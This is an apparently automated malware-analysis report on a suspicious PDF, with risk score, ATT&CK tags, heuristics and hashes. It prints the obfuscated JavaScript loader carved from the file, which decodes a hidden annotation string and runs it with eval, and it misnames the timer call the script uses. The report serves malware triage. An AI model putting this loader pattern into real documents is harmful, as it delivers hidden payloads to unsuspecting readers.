SUSPICIOUS
56
Risk Score
Malware Insights
MITRE ATT&CK
T1059.007 JavaScript
T1566.001 Spearphishing Attachment
The PDF contains embedded JavaScript that is heavily obfuscated using character code manipulation and string concatenation. The script decodes a string using a base value of 237 and then executes it using `app.setInterval`. This pattern is commonly used to download and execute a second-stage payload. The ML classifier also flagged this PDF as malicious with high confidence.
Machine Learning
- Nyx PDF Classifier malicious score 0.9999
Heuristics 4
-
JavaScript action low 1 related finding PDF_JAVASCRIPTPDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Embedded JS stream low PDF_JSPDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Optional Content Group with action trigger low PDF_OPTIONAL_CONTENTOptional Content Group (layer) co-occurs with an action trigger — content can be selectively hidden from viewers or scanners while the action still fires on open
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
javascript_obj0010_000.js |
pdf-javascript-stream | PDF /JS object 10 at offset 0x8CDA | 1346 bytes |
SHA-256: 4f4032a2182b874f3b1232f2f4b72c085ae0e07605dea9074b0b6fe9b9735275 |
|||
Preview scriptFirst 1,000 lines of the extracted script
�� v a r B k G b x Z l F z = 2 3 7 ;
v a r B 3 F h h E B z = t h i s . g e t A n n o t ( 0 , " 0 0 0 1 - 0 0 0 4 " ) ;
i f ( B 3 F h h E B z ! = n u l l ) {
A 9 j y J e 8 = B 3 F h h E B z . s u b j e c t ;
}
A 9 j y J e 8 = A 9 j y J e 8 . r e p l a c e ( / [ ^ 0 - 9 ] / g , ' ; ' ) ;
A 9 j y J e 8 = A 9 j y J e 8 . r e p l a c e ( / ; ; / g , ' ' ) ;
f u n c t i o n R 0 L W M Z 2 j b I 2 g ( W 2 g n J i U e z s g V , g i 4 b T B D 7 a B Q r ) {
v a r h X s 4 s = n e w S t r i n g ( ) ; v a r r n w R k P M B 5 i = n e w S t r i n g ( ) ;
F D R o X = W 2 g n J i U e z s g V . s p l i t ( ' ; ' ) ;
f o r ( v v X q C 0 o l = 0 ; v v X q C 0 o l < F D R o X . l e n g t h - 1 ; v v X q C 0 o l + + ) {
P 4 l w b e z T = S t r i n g [ ' f r o m ' + ' C h a r ' + ' C o d e ' ] ( F D R o X [ v v X q C 0 o l ] - g i 4 b T B D 7 a B Q r ) ;
r n w R k P M B 5 i = r n w R k P M B 5 i + P 4 l w b e z T ; } r e t u r n r n w R k P M B 5 i ; } ;
v n Q k X p 8 i = R 0 L W M Z 2 j b I 2 g ( A 9 j y J e 8 , B k G b x Z l F z ) ;
v a r t = ' a ' ;
v a r d = ' u ' ;
l i b b b = a p p [ ' s e t ' + ' T i m e O ' + d + ' t ' ] ( " e v " + t + " l ( v n Q k X p 8 i ) " , 1 0 0 ) ;
|
|||
stream_001_off00008cda.bin |
decompressed-pdf-stream | PDF FlateDecoded stream at offset 0x8CDA | 672 bytes |
SHA-256: 8f98b621fb93e8c8b0eac8b0b27f9668536e5f68be52b3e5738ae14120777987 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
9 of 17 identifiers look randomly generated (e.g. 'gi4bTBD7aBQr'); 2 string-concatenation chain(s) — consistent with name-mangling obfuscation.
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.